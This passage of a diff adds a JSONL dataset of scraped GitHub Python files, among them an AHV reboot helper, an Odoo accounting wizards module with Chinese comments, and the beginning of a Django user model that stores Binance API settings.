diff --git "a/4551.jsonl" "b/4551.jsonl" new file mode 100644--- /dev/null +++ "b/4551.jsonl" @@ -0,0 +1,2411 @@ +{"seq_id":"37767767048","text":"from remote_host import (RemoteHost, module_print)\n\nclass RebootToAhv(object):\n \"\"\"\n Base class to perform operations on reboot to Ahv.\n \"\"\"\n def __init__(self, options):\n self.options = options\n self.host = None\n\n def reboot_to_ahv(self):\n \"\"\"\n Reboots specified node into Ahv.\n Returns:\n True: Node successfully booted into Ahv.\n False: Error rebooting node into Ahv.\n Raises:\n StandardError\n \"\"\"\n self.host = RemoteHost.get_instance(self.options)\n if not self.host:\n module_print(\"Unable to get the Remote Host type\")\n return False\n import json\n with open(self.options.config, \"r\") as f:\n cfg = json.load(f)\n ret, err = self.host.reboot_to_target(target=\"ahv\", config=cfg)\n if not ret:\n module_print(\"Unable to boot node [%s] into Ahv err: [%s]\" %\n (self.options.node_ip, err))\n return False\n\n # wait for node to boot into Ahv\n module_print(\"Successfully booted into Ahv\")\n return True\n","repo_name":"sarabjit-saini/griffon-poc","sub_path":"provider/src/reboot_to_ahv.py","file_name":"reboot_to_ahv.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1499471000","text":"# -*- coding: utf-8 -*-\nfrom decimal import Decimal\nimport json\nfrom odoo import api\nfrom odoo import exceptions\nfrom odoo import fields\nfrom odoo import models\nfrom ..models.main_models import AccountsBalance\nfrom ..models.main_models import Voucher\nfrom ..models.ac_period import Period\nfrom ..models.main_models import Glob_tag_Model\n\n\n# 向导部分-开始\n# 新增下级科目的向导\nclass CreateChildAccountWizard(models.TransientModel, Glob_tag_Model):\n '''新增下级科目的向导'''\n _name = 'accountcore.create_child_account'\n _description = '新增下级科目向导'\n fatherAccountId = fields.Many2one('accountcore.account',\n string='上级科目',\n help='新增科目的直接上级科目')\n fatherAccountNumber = fields.Char(related='fatherAccountId.number',\n string='上级科目编码')\n\n org = fields.Many2one('accountcore.org',\n string='所属机构',\n help=\"科目所属机构\",\n index=True,\n ondelete='restrict')\n\n accountsArch = fields.Many2one('accountcore.accounts_arch',\n string='所属科目体系',\n help=\"科目所属体系\",\n index=True,\n ondelete='restrict')\n\n accountClass = fields.Many2one('accountcore.accountclass',\n string='科目类别',\n index=True,\n ondelete='restrict')\n number = fields.Char(string='科目编码', required=True)\n name = fields.Char(string='科目名称', required=True)\n direction = fields.Selection([('1', '借'),\n ('-1', '贷')],\n string='余额方向',\n required=True)\n is_show = fields.Boolean(string='凭证中显示', default=True)\n cashFlowControl = fields.Boolean(string='分配现金流量')\n itemClasses = fields.Many2many('accountcore.itemclass',\n string='包含的核算项目类别',\n help=\"录入凭证时,提示选择该类别下的核算项目\",\n ondelete='restrict')\n accountItemClass = fields.Many2one('accountcore.itemclass',\n string='作为明细科目的类别',\n help=\"录入凭证分录时必须输入的该类别下的一个核算项目,作用相当于明细科目\",\n ondelete='restrict')\n explain = fields.Html(string='科目说明')\n @api.model\n def default_get(self, field_names):\n default = super().default_get(field_names)\n fatherAccountId = self.env.context.get('active_id')\n fatherAccount = self.env['accountcore.account'].sudo().search(\n [['id', '=', fatherAccountId]])\n default['accountsArch'] = fatherAccount.accountsArch.id\n default['fatherAccountId'] = fatherAccountId\n default['org'] = fatherAccount.org.id\n default['accountClass'] = fatherAccount.accountClass.id\n default['direction'] = fatherAccount.direction\n default['cashFlowControl'] = fatherAccount.cashFlowControl\n default['number'] = fatherAccount.number + \\\n '.' + str(fatherAccount.currentChildNumber)\n return default\n\n @api.model\n def create(self, values):\n if 'name' in values:\n if '-' in values['name']:\n raise exceptions.ValidationError(\"科目名称中不能含有'-'字符\")\n if ' ' in values['name']:\n raise exceptions.ValidationError(\"科目名称中不能含有空格\")\n fatherAccountId = self.env.context.get('active_id')\n accountTable = self.env['accountcore.account'].sudo()\n fatherAccount = accountTable.search(\n [['id', '=', fatherAccountId]])\n newAccount = {'fatherAccountId': fatherAccountId,\n 'org': fatherAccount.org.id,\n 'accountClass': fatherAccount.accountClass.id,\n 'cashFlowControl': values['cashFlowControl'],\n 'name': fatherAccount.name+'---'+values['name'],\n 'direction': fatherAccount.direction,\n 'number': fatherAccount.number + '.'\n + str(fatherAccount.currentChildNumber)}\n fatherAccount.currentChildNumber = fatherAccount.currentChildNumber+1\n values.update(newAccount)\n rl = super(CreateChildAccountWizard, self).create(values)\n a = accountTable.create(values)\n # 添加到上级科目的直接下级\n fatherAccount.write({'childs_ids': [(4, a.id)], 'is_show': False})\n return rl\n\n\n# 用户设置模型字段的默认取值向导(如,设置凭证默认值)\nclass AccountcoreUserDefaults(models.TransientModel):\n '''用户设置模型字段的默认取值向导'''\n _name = 'accountcoure.userdefaults'\n _description = '用户设置模型字段默认值'\n default_ruleBook = fields.Many2many('accountcore.rulebook',\n string='默认凭证标签')\n default_org = fields.Many2one('accountcore.org',\n string='默认机构')\n default_voucherDate = fields.Date(string='记账日期',\n default=fields.Date.today())\n default_real_date = fields.Date(string='业务日期')\n\n # 设置新增凭证,日期,机构和账套字段的默认值\n def setDefaults(self):\n modelName = 'accountcore.voucher'\n self._setDefault(modelName,\n 'ruleBook',\n self.default_ruleBook.ids)\n self._setDefault(modelName,\n 'org',\n self.default_org.id)\n self._setDefault(modelName, 'voucherdate',\n json.dumps(self.default_voucherDate.strftime('%Y-%m-%d')))\n if self.default_real_date:\n self._setDefault(modelName, 'real_date',\n json.dumps(self.default_real_date.strftime('%Y-%m-%d')))\n self.env.user.currentOrg = self.default_org.id\n self.env.user.current_date = self.default_voucherDate\n return True\n\n # 设置默认值\n def _setDefault(self, modelName, fieldName, defaultValue):\n idOfField = self._getIdOfIdField(fieldName,\n modelName,)\n rd = self._getDefaultRecord(idOfField)\n if rd.exists():\n self._modifyDefault(rd, idOfField, defaultValue)\n else:\n self._createDefault(idOfField, defaultValue)\n\n # 获取要设置默认值的字段在ir.model.fields中的id\n def _getIdOfIdField(self, fieldName, modelname):\n domain = [('model', '=', modelname),\n ('name', '=', fieldName)]\n rds = self.env['ir.model.fields'].sudo().search(domain, limit=1)\n return rds.id\n\n # 是否已经设置过该字段的默认值\n def _getDefaultRecord(self, id):\n domain = [('field_id', '=', id),\n ('user_id', '=', self.env.uid)]\n rds = self.env['ir.default'].sudo().search(domain, limit=1)\n return rds\n\n def _modifyDefault(self, rd, idOfField, defaultValue):\n rd.write({\n 'field_id': idOfField,\n 'json_value': defaultValue,\n 'user_id': self.env.uid\n })\n\n def _createDefault(self, idOfField, defaultValue):\n self.env['ir.default'].sudo().create({\n 'field_id': idOfField,\n 'json_value': defaultValue,\n 'user_id': self.env.uid\n })\n\n\n# 设置用户默认凭证编码策略向导\nclass NumberStaticsWizard(models.TransientModel):\n '''设置用户默认凭证编码策略向导'''\n _name = 'accountcore.voucher_number_statics_default'\n _description = '设置用户默认凭证编码策略向导'\n voucherNumberTastics = fields.Many2one('accountcore.voucher_number_tastics',\n string='用户默认凭证编码策略')\n\n @api.model\n def default_get(self, field_names):\n default = super().default_get(field_names)\n default['voucherNumberTastics'] = self.env.user.voucherNumberTastics.id\n return default\n\n def setVoucherNumberTastics(self, args):\n currentUserId = self.env.uid\n currentUserTable = self.env['res.users'].sudo().browse(currentUserId)\n currentUserTable.write(\n {'voucherNumberTastics': self. voucherNumberTastics.id})\n return True\n\n\n# 设置凭证编号向导\nclass SetingVoucherNumberWizard(models.TransientModel):\n '''设置凭证编号向导'''\n _name = 'accountcore.seting_vouchers_number'\n _description = '设置凭证编号向导'\n voucherNumberTastics = fields.Many2one('accountcore.voucher_number_tastics',\n '要使用的凭证编码策略',\n required=True)\n startNumber = fields.Integer(string='从此编号开始', default=1, required=True)\n\n @api.model\n def default_get(self, field_names):\n '''获得用户的默认凭证编号策略'''\n default = super().default_get(field_names)\n if self.env.user.voucherNumberTastics:\n default['voucherNumberTastics'] = self.env.user.voucherNumberTastics.id\n return default\n\n def setingNumber(self, args):\n startNumber = self.startNumber\n numberTasticsId = self.voucherNumberTastics.id\n vouchers = self.env['accountcore.voucher'].sudo().browse(\n args['active_ids'])\n vouchers.sorted(key=lambda r: r.sequence)\n if startNumber <= 0:\n startNumber = 1\n for voucher in vouchers:\n oldstr = voucher.numberTasticsContainer_str\n voucher.numberTasticsContainer_str = Voucher.getNewNumberDict(\n oldstr,\n numberTasticsId,\n startNumber)\n startNumber += 1\n return {'name': '已生成凭证编号',\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'accountcore.voucher',\n 'view_id': False,\n 'type': 'ir.actions.act_window',\n 'domain': [('id', 'in', args['active_ids'])]\n }\n\n\n# 设置单张凭证编号向导\nclass SetingVoucherNumberSingleWizard(models.TransientModel):\n '''设置单张凭证编号向导'''\n _name = 'accountcore.seting_voucher_number_single'\n _description = '设置单张凭证编号向导'\n newNumber = fields.Integer(string='新凭证编号', required=True)\n\n def setVoucherNumberSingle(self, argsDist):\n '''设置修改凭证编号'''\n newNumber = self.newNumber\n currentUserNumberTastics_id = 0\n if(self.env.user.voucherNumberTastics):\n currentUserNumberTastics_id = self.env.user.voucherNumberTastics.id\n voucher = self.env['accountcore.voucher'].sudo().browse(\n argsDist['active_id'])\n voucher.numberTasticsContainer_str = Voucher.getNewNumberDict(\n voucher.numberTasticsContainer_str,\n currentUserNumberTastics_id,\n newNumber)\n return True\n\n\n# 科目余额查询向导\nclass GetAccountsBalance(models.TransientModel):\n '''科目余额查询向导'''\n _name = 'accountcore.get_account_balance'\n _description = '科目查询向导'\n startDate = fields.Date(string=\"开始期间\")\n endDate = fields.Date(string=\"结束期间\")\n fast_period = fields.Date(string=\"选取期间\", store=False)\n onlyShowOneLevel = fields.Boolean(string=\"只显示一级科目\", default=False)\n summaryLevelByLevel = fields.Boolean(string='逐级汇总科目',\n default=True,\n readonly=True)\n includeAccountItems = fields.Boolean(string='包含核算项目', default=True)\n no_show_no_hanppend = fields.Boolean(string='隐藏无发生额的科目', default=False)\n order_orgs = fields.Boolean(string='多机构分开显示', default=False)\n noShowZeroBalance = fields.Boolean(string='隐藏余额为零的科目', default=False)\n noShowNoAmount = fields.Boolean(\n string='没有任何金额不显示', default=True)\n sum_orgs = fields.Boolean(\n string='多机构合并显示', default=False)\n orgs = fields.Many2many(\n 'accountcore.org',\n string='机构范围',\n default=lambda s: s.env.user.currentOrg,\n required=True\n\n )\n account = fields.Many2many('accountcore.account',\n string='科目范围',\n required=True)\n\n @api.multi\n def getReport(self, args):\n '''查询科目余额'''\n self.ensure_one()\n if len(self.orgs) == 0:\n raise exceptions.ValidationError('你还没选择机构范围!')\n return False\n if len(self.account) == 0:\n self.account = self.env['accountcore.account'].search([])\n # raise exceptions.ValidationError('你需要选择查询的科目范围!')\n # return False\n self._setDefaultDate()\n [data] = self.read()\n datas = {\n 'form': data\n }\n return self.env.ref('accountcore.accounctore_accountsbalance_report').report_action([], data=datas)\n\n def _setDefaultDate(self):\n if not self.startDate:\n self.startDate = '1970-01-01'\n if not self.endDate:\n self.endDate = '9999-12-31'\n if self.startDate > self.endDate:\n raise exceptions.ValidationError('你选择的开始日期不能大于结束日期')\n\n\n# 科目明细账查询向导\nclass GetSubsidiaryBook(models.TransientModel):\n \"科目明细账查询向导\"\n _name = 'accountcore.get_subsidiary_book'\n _description = '科目明细账查询向导'\n startDate = fields.Date(string='开始月份')\n endDate = fields.Date(string='结束月份')\n fast_period = fields.Date(string=\"选取期间\", store=False)\n orgs = fields.Many2many('accountcore.org',\n string='机构范围',\n default=lambda s: s.env.user.currentOrg,\n required=True)\n account = fields.Many2one(\n 'accountcore.account', string='查询的科目', required=True)\n only_this_level = fields.Boolean(string='只包含本级科目', default=False)\n item = fields.Many2one('accountcore.item', string='查询的核算项目')\n voucher_number_tastics = fields.Many2one('accountcore.voucher_number_tastics',\n string='凭证号策略',\n required=True,\n default=lambda s: s.env.user.voucherNumberTastics)\n\n @api.multi\n def getReport(self, *args):\n self.ensure_one()\n if len(self.orgs) == 0:\n raise exceptions.ValidationError('你还没选择机构范围!')\n return False\n if not self.account:\n raise exceptions.ValidationError('你需要选择查询的科目!')\n return False\n if not self.voucher_number_tastics:\n raise exceptions.ValidationError('你需要选择查询凭证编码策略!')\n return False\n self._setDefaultDate()\n [data] = self.read()\n datas = {\n 'form': data\n }\n return self.env.ref('accountcore.subsidiarybook_report').report_action([], data=datas)\n\n def _setDefaultDate(self):\n if not self.startDate:\n self.startDate = '1970-01-01'\n if not self.endDate:\n self.endDate = '9999-12-31'\n if self.startDate > self.endDate:\n raise exceptions.ValidationError('你选择的开始日期不能大于结束日期')\n\n\n# 自动结转损益向导\nclass currencyDown_sunyi(models.TransientModel):\n \"自动结转损益向导\"\n _name = 'accountcore.currency_down_sunyi'\n _description = '自动结转损益向导'\n startDate = fields.Date(string='开始月份', required=True)\n endDate = fields.Date(string='结束月份', required=True)\n fast_period = fields.Date(string=\"选取期间\", store=False)\n orgs = fields.Many2many(\n 'accountcore.org',\n string='机构范围',\n default=lambda s: s.env.user.currentOrg, required=True)\n\n # def soucre(self):\n # return self.env.ref('rulebook_1')\n\n @api.multi\n def do(self, *args):\n '''执行结转损益'''\n self.ensure_one()\n if len(self.orgs) == 0:\n raise exceptions.ValidationError('你还没选择机构范围!')\n return False\n if self.startDate > self.endDate:\n raise exceptions.ValidationError('你选择的开始日期不能大于结束日期')\n\n # 获得需要结转的会计期间\n periods = Period(self.startDate, self.endDate).getPeriodList()\n\n self.t_entry = self.env['accountcore.entry']\n # 本年利润科目\n self.ben_nian_li_run_account = self.env['accountcore.special_accounts'].sudo().search([\n ('name', '=', '本年利润科目')]).accounts\n if self.ben_nian_li_run_account:\n self.ben_nian_li_run_account_id = self.ben_nian_li_run_account.id\n else:\n self.ben_nian_li_run_account_id = self.env.ref(\n 'special_accounts_1')\n # 损益调整科目\n self.sun_yi_tiao_zhen_account = self.env['accountcore.special_accounts'].sudo().search([\n ('name', '=', '以前年度损益调整科目')]).accounts\n if self.sun_yi_tiao_zhen_account:\n self.sun_yi_tiao_zhen_account_id = self.sun_yi_tiao_zhen_account.id\n else:\n self.sun_yi_tiao_zhen_account_id = self.env.ref(\n 'special_accounts_3')\n # 依次处理选种机构\n # 生成的凭证列表\n voucher_ids = []\n for org in self.orgs:\n # 依次处理会计期间\n for p in periods:\n voucher = self._do_currencyDown(org, p)\n if voucher:\n voucher_ids.append(voucher.id)\n\n return {'name': '自动生成的结转损益凭证',\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'accountcore.voucher',\n 'view_id': False,\n 'type': 'ir.actions.act_window',\n 'domain': [('id', 'in', voucher_ids)]\n }\n\n def _do_currencyDown(self, org, voucher_period):\n '''结转指定机构某会计期间的损益'''\n\n # 找出损益类相关科目\n accounts = self._get_sunyi_accounts(org)\n # 获得损益类相关科目在期间的余额\n accountsBalance = self._get_balances(org, voucher_period, accounts)\n # 根据余额生成结转损益的凭证\n voucher = self._creat_voucher(accountsBalance, org, voucher_period)\n return voucher\n\n def _get_sunyi_accounts(self, org):\n '''获得该机构的结转损益类科目'''\n # 属于损益类别的科目,但不包括\"以前年度损益调整\"\n accounts = self.env['accountcore.account'].sudo().search([('accountClass.name', '=', '损益类'),\n ('id', '!=',\n # self.sun_yi_tiao_zhen_account.id),\n self.sun_yi_tiao_zhen_account_id),\n '|', ('org',\n '=', org.id),\n ('org', '=', False)])\n return accounts\n\n def _get_balances(self, org, vouhcer_period, accounts):\n '''获得某一机构在一个会计月份的余额记录'''\n accountsBalance = []\n for account in accounts:\n if not account.accountItemClass:\n balance = account.getBalanceOfVoucherPeriod(vouhcer_period,\n org,\n None)\n if balance:\n accountsBalance.append(balance)\n else:\n items = account.getAllItemsInBalancesOf(org)\n if items:\n for item in items:\n balance = account.getBalanceOfVoucherPeriod(vouhcer_period,\n org,\n item)\n if balance:\n accountsBalance.append(balance)\n return accountsBalance\n\n def _creat_voucher(self, accountsBalance, org, voucer_period):\n '''新增结转损益凭证'''\n # 结转到本年利润的借方合计\n zero = Decimal.from_float(0).quantize(Decimal('0.00'))\n sum_d = Decimal.from_float(0).quantize(Decimal('0.00'))\n # 结转到本年利润的贷方合计\n sum_c = Decimal.from_float(0).quantize(Decimal('0.00'))\n\n entrys_value = []\n # 根据科目余额生成分录\n for b in accountsBalance:\n b_items_id = []\n if b.items.id:\n b_items_id = [b.items.id]\n endAmount = Decimal.from_float(b.endDamount).quantize(\n Decimal('0.00'))-Decimal.from_float(b.endCamount).quantize(Decimal('0.00'))\n if b.account.direction == '1':\n if endAmount != zero:\n\n entrys_value.append({\"explain\": '结转损益',\n \"account\": b.account.id,\n \"items\": [(6, 0, b_items_id)],\n \"camount\": endAmount\n })\n sum_d = sum_d + endAmount\n else:\n if endAmount != zero:\n entrys_value.append({\"explain\": '结转损益',\n \"account\": b.account.id,\n \"items\": [(6, 0, b_items_id)],\n \"damount\": -endAmount\n })\n sum_c = sum_c - endAmount\n # 本年利润科目分录\n\n # 结转到贷方\n if sum_d != zero:\n entrys_value.append({\"explain\": '结转损益',\n # \"account\": self.ben_nian_li_run_account.id,\n \"account\": self.ben_nian_li_run_account_id,\n \"damount\": sum_d\n })\n # 结转到借方\n if sum_c != zero:\n entrys_value.append({\"explain\": '结转损益',\n # \"account\": self.ben_nian_li_run_account.id,\n \"account\": self.ben_nian_li_run_account_id,\n \"camount\": sum_c\n })\n if len(entrys_value) < 2:\n return None\n entrys = self.t_entry.sudo().create(entrys_value)\n voucher = self.env['accountcore.voucher'].sudo().create({\n 'voucherdate': voucer_period.endDate,\n 'org': org.id,\n 'soucre': self.env.ref('accountcore.source_2').id,\n 'ruleBook': [(6, 0, [self.env.ref('accountcore.rulebook_1').id])],\n 'entrys': [(6, 0, entrys.ids)],\n 'createUser': self.env.uid,\n })\n return voucher\n\n\n# 启用期初试算平衡向导\nclass BeginBalanceCheck(models.TransientModel):\n '''启用期初试算平衡向导'''\n _name = 'accountcore.begin_balance_check'\n _description = '启用期初试算平衡向导'\n org_ids = fields.Many2many('accountcore.org',\n string='待检查机构',\n required=True,\n default=lambda s: s.env.user.currentOrg)\n result = fields.Html(string='检查结果')\n\n @api.multi\n def do_check(self, *args):\n '''对选中机构执行平衡检查'''\n self.ensure_one()\n check_result = {}\n result_htmlStr = ''\n for org in self.org_ids:\n check_result[org.name] = self._check(org)\n for (key, value) in check_result.items():\n result_htmlStr = result_htmlStr+\"
\" + \\\n key+\"
\"+\"\".join([v[1] for v in value])\n self.result = result_htmlStr\n return {\n 'name': '启用期初平衡检查',\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'target': 'new',\n 'res_model': 'accountcore.begin_balance_check',\n 'res_id': self.id,\n }\n\n def _check(self, org):\n '''对一个机构执行平衡检查'''\n rl = []\n # 获得机构期初\n balance_records = AccountsBalance.getBeginOfOrg(org)\n # 检查月初本年累计发生额借方合计=贷方合计\n rl.append(self._checkCumulativeAmountBalance(balance_records))\n # 检查月初余额借方合计=贷方合计\n rl.append(self._checkBeginingAmountBalance(balance_records))\n # 检查月已发生额借方合计=贷方合计\n rl.append(self._checkAmountBalance(balance_records))\n # 检查资产=负债+所有者权益+收入-理论\n rl.append(self._checkBalance(balance_records))\n return rl\n\n def _checkCumulativeAmountBalance(self, balance_records):\n '''检查月初本年累计发生额借方合计'''\n damount = AccountsBalance._sumFieldOf(\n 'cumulativeDamount', balance_records)\n camount = AccountsBalance._sumFieldOf(\n 'cumulativeCamount', balance_records)\n imbalanceAmount = damount-camount\n if imbalanceAmount == 0:\n rl_html = \"
月初本年借方累计发生额=月初本年贷方累计发生额[\" + \\\n str(damount) + \"=\"+str(camount)+\"]
\"\n return (True, rl_html)\n else:\n rl_html = \"
月初本年借方累计发生额合计=月初本年贷方累计发生额合计[\" + \\\n str(damount)+\"-\" + str(camount) + \\\n \"=\"+str(imbalanceAmount)+\"]
\"\n return (False, rl_html)\n\n def _checkBeginingAmountBalance(self, balance_records):\n '''检查月初余额借方合计'''\n damount = AccountsBalance._sumFieldOf('beginingDamount',\n balance_records)\n camount = AccountsBalance._sumFieldOf('beginingCamount',\n balance_records)\n imbalanceAmount = damount-camount\n if imbalanceAmount == 0:\n rl_html = \"
月初借方余额合计=月初贷方贷方余额合计[\" + \\\n str(damount) + \"=\" + str(camount) + \"]
\"\n return (True, rl_html)\n else:\n rl_html = \"
月初借方余额合计=月初贷方余额合计[\" + \\\n str(damount) + \"-\" + str(camount) + \\\n \"=\"+str(imbalanceAmount)+\"]
\"\n return (False, rl_html)\n\n def _checkAmountBalance(self, balance_records):\n '''检查月已发生额借方合计'''\n damount = AccountsBalance._sumFieldOf('damount',\n balance_records)\n camount = AccountsBalance._sumFieldOf('camount',\n balance_records)\n imbalanceAmount = damount-camount\n if imbalanceAmount == 0:\n rl_html = \"
月借方已发生额合计=月贷方已发生额合计[\" + \\\n str(damount) + \"=\" + str(camount) + \"]
\"\n return (True, rl_html)\n else:\n rl_html = \"
月借方已发生额合计=月贷方已发生额合计[\" + \\\n str(damount) + \"-\" + str(camount) + \\\n \"=\"+str(imbalanceAmount)+\"]
\"\n return (False, rl_html)\n\n def _checkBalance(self, balance_records):\n '''检查资产=负债+所有者权益+收入-成本'''\n return (True, \".....\")\n\n\n# 新增下级现金流量向导\nclass CreateChildCashoFlowWizard(models.TransientModel, Glob_tag_Model):\n '''新增下级现金流量的向导'''\n _name = 'accountcore.create_child_cashflow'\n _description = '新增下级现金流量向导'\n parent_id = fields.Many2one('accountcore.cashflow',\n string='上级现金流量名称',\n help='新增现金流量的直接上级科目')\n parent_number = fields.Char(related='parent_id.number',\n string='上级现金流量编码')\n\n cash_flow_type = fields.Many2one('accountcore.cashflowtype',\n string='现金流量类别',\n index=True,\n ondelete='restrict')\n number = fields.Char(string='现金流量编码', required=True)\n name = fields.Char(string='现金流量名称', required=True)\n direction = fields.Selection(\n [(\"-1\", \"流出\"), (\"1\", \"流入\")], string='流量方向', required=True)\n\n @api.model\n def default_get(self, field_names):\n default = super().default_get(field_names)\n parent_id = self.env.context.get('active_id')\n parent = self.env['accountcore.cashflow'].sudo().search(\n [['id', '=', parent_id]])\n default['parent_id'] = parent_id\n default['cash_flow_type'] = parent.cashFlowType.id\n default['direction'] = parent.direction\n default['number'] = parent.number + \\\n '.' + str(parent.currentChildNumber)\n return default\n\n @api.model\n def create(self, values):\n parent_id = self.env.context.get('active_id')\n Table = self.env['accountcore.cashflow'].sudo()\n parent = Table.search(\n [['id', '=', parent_id]])\n newOne = {'parent_id': parent_id,\n 'cashFlowType': parent.cashFlowType.id,\n 'name': parent.name+'---'+values['name'],\n 'number': parent.number + '.'\n + str(parent.currentChildNumber),\n 'direction': parent.direction}\n parent.currentChildNumber = parent.currentChildNumber+1\n values.update(newOne)\n rl = super(CreateChildCashoFlowWizard, self).create(values)\n a = Table.create(values)\n # 添加到上级科目的直接下级\n parent.write({'childs_ids': [(4, a.id)]})\n return rl\n\n # 向导部分-结束\n\n\n# 报表生成向导\nclass GetReport(models.TransientModel):\n \"报表生成向导\"\n _name = 'accountcore.get_report'\n _description = '报表生成向导'\n report_model = fields.Many2one('accountcore.report_model',\n string='报表模板')\n guid = fields.Char(related='report_model.guid')\n summary = fields.Text(related='report_model.summary')\n startDate = fields.Date(string='开始月份')\n endDate = fields.Date(string='结束月份')\n fast_period = fields.Date(string=\"选取期间\", store=False)\n orgs = fields.Many2many('accountcore.org',\n string='机构范围',\n default=lambda s: s.env.user.currentOrg,\n required=True)\n\n def do(self):\n '''根据模板生成报表'''\n return {\n 'name': \"生成报表\",\n 'type': 'ir.actions.act_window',\n 'res_model': 'accountcore.report_model',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'target': 'current',\n 'res_id': self.report_model.id,\n 'context': {\n 'form_view_initial_mode': 'edit',\n 'start_data': self.startDate,\n 'end_data': self.endDate,\n 'orgs': self.orgs.ids,\n }\n }\n\n# 设置报表模板公式向导\n\n\nclass ReportModelFormula(models.TransientModel):\n '''设置报表公式向导'''\n _name = 'accountcore.reportmodel_formula'\n _description = '设置报表公式向导'\n account_id = fields.Many2one('accountcore.account', string='会计科目')\n has_child = fields.Boolean(string='是否包含明细科目', default=True)\n item_ids = fields.Many2many('accountcore.item', string='作为明细科目的核算项目')\n account_amount_type = fields.Many2one('accountcore.account_amount_type',\n string='金额类型')\n formula = fields.Text(string='公式内容')\n btn_join_reduce = fields.Char()\n btn_join_add = fields.Char()\n btn_clear = fields.Char()\n @api.model\n def default_get(self, field_names):\n default = super().default_get(field_names)\n if self.env.context.get('ac'):\n default['formula'] = self.env.context.get('ac')\n return default\n\n def do(self):\n '''公式填入单元格'''\n return {\n 'type': 'ir.actions.client',\n 'name': '',\n 'tag': 'update_formula',\n 'target': 'new',\n 'context': {'accountName': self.formula}\n }\n\n @api.onchange('btn_join_reduce')\n def join_reduce(self):\n '''减进公式'''\n # 窗口弹出时不执行,直接返回\n if not self.btn_join_reduce:\n return\n if not self.account_id.name:\n return {\n 'warning': {\n 'message': \"请选择会计科目\",\n },\n }\n if not self.account_amount_type:\n return {\n 'warning': {\n 'message': \"请选择金额类型\",\n },\n }\n items = ''\n for i in self.item_ids:\n items = items+i.name+'/'\n mark = \"-\"\n if not self.formula:\n self.formula = \"\"\n self.formula = (self.formula+mark+\"account('\"\n + self.account_id.name\n + \"','\"+str(self.has_child)\n + \"','\"+self.account_amount_type.name\n + \"','\"+items\n + \"')\")\n\n @api.onchange('btn_join_add')\n def join_add(self):\n '''加进公式'''\n # 窗口弹出时不执行,直接返回\n if not self.btn_join_add:\n return\n if not self.account_id.name:\n return {\n 'warning': {\n 'message': \"请选择会计科目\",\n },\n }\n if not self.account_amount_type:\n return {\n 'warning': {\n 'message': \"请选择金额类型\",\n },\n }\n items = ''\n for i in self.item_ids:\n items = items+i.name+'/'\n mark = \"\"\n if self.formula:\n mark = \"+\"\n else:\n self.formula = \"\"\n self.formula = (self.formula+mark+\"account('\"\n + self.account_id.name\n + \"','\"+str(self.has_child)\n + \"','\"+self.account_amount_type.name\n + \"','\"+items\n + \"')\")\n\n @api.onchange('btn_clear')\n def join_clear(self):\n '''清除公式'''\n # 窗口弹出时不执行,直接返回\n if not self.btn_clear:\n return\n self.formula = \"\"\n","repo_name":"123wj2003/accountcore","sub_path":"wizard/wizards.py","file_name":"wizards.py","file_ext":"py","file_size_in_byte":36382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"34252636453","text":"from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager\nfrom django.db import models\nfrom datetime import datetime\nfrom django.core.mail import send_mail\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.utils.translation import ugettext_lazy as _\nfrom binance.enums import *\nfrom binance.client import Client\nfrom unixtimestampfield.fields import UnixTimeStampField\nimport math, time\nclass UserManager(BaseUserManager):\n \"\"\"ユーザーマネージャー.\"\"\"\n\n use_in_migrations = True\n\n def _create_user(self, email, password, **extra_fields):\n \"\"\"メールアドレスでの登録を必須にする\"\"\"\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n def create_user(self, email, password=None, **extra_fields):\n \"\"\"is_staff(管理サイトにログインできるか)と、is_superuer(全ての権限)をFalseに\"\"\"\n extra_fields.setdefault('is_staff', False)\n extra_fields.setdefault('is_superuser', False)\n return self._create_user(email, password, **extra_fields)\n\n def create_superuser(self, email, password, **extra_fields):\n \"\"\"スーパーユーザーは、is_staffとis_superuserをTrueに\"\"\"\n extra_fields.setdefault('is_staff', True)\n extra_fields.setdefault('is_superuser', True)\n\n if extra_fields.get('is_staff') is not True:\n raise ValueError('Superuser must have is_staff=True.')\n if extra_fields.get('is_superuser') is not True:\n raise ValueError('Superuser must have is_superuser=True.')\n\n return self._create_user(email, password, **extra_fields)\n\nclass User(AbstractBaseUser, PermissionsMixin):\n \n email = models.EmailField(_('メールアドレス'), unique=True)\n api_key = models.CharField(_('API KEY'), max_length=255, blank=True, null = True)\n api_secret_key = models.CharField(_('API SECRET KEY'), max_length=255, blank=True, null = True)\n \n do_btc = models.BooleanField(\n verbose_name = 'BTC',\n default = True\n )\n btc_unit_amount = models.FloatField(\n default = 0.001\n )\n do_eth = models.BooleanField(\n verbose_name = 'ETH',\n default = True\n )\n eth_unit_amount = models.FloatField(\n default = 0.001\n )\n \n do_usdt = models.BooleanField(\n verbose_name = 'USTD',\n default = True\n )\n usdt_unit_amount = models.FloatField(\n default = 0.001\n )\n \n do_bnb = models.BooleanField(\n verbose_name = 'BNB',\n default = True\n )\n bnb_unit_amount = models.FloatField(\n default = 0.001\n )\n \n max_quantity_rate = models.FloatField(\n verbose_name = '取引上限%',\n default = 0.5\n )\n\n target_profit_rate = models.FloatField(\n verbose_name = '取引施行利益',\n default = 0.5\n )\n\n auto_trading = models.BooleanField(\n verbose_name = '自動取引',\n default = False\n )\n max_active_scenario = models.IntegerField(\n verbose_name = '最大シナリオ数',\n default = 10\n )\n commission_rate = models.FloatField(\n verbose_name = '手数料',\n default = 0.075\n )\n\n is_staff = models.BooleanField(\n _('管理者'),\n default=False,\n help_text=_(\n 'Designates whether the user can log into this admin site.'),\n )\n is_active = models.BooleanField(\n _('利用開始'),\n default=True,\n help_text=_(\n 'Designates whether this user should be treated as active. '\n 'Unselect this instead of deleting accounts.'\n ),\n )\n\n objects = UserManager()\n\n EMAIL_FIELD = 'email'\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS = []\n\n def email_user(self, subject, message, from_email=None, **kwargs):\n \"\"\"Send an email to this 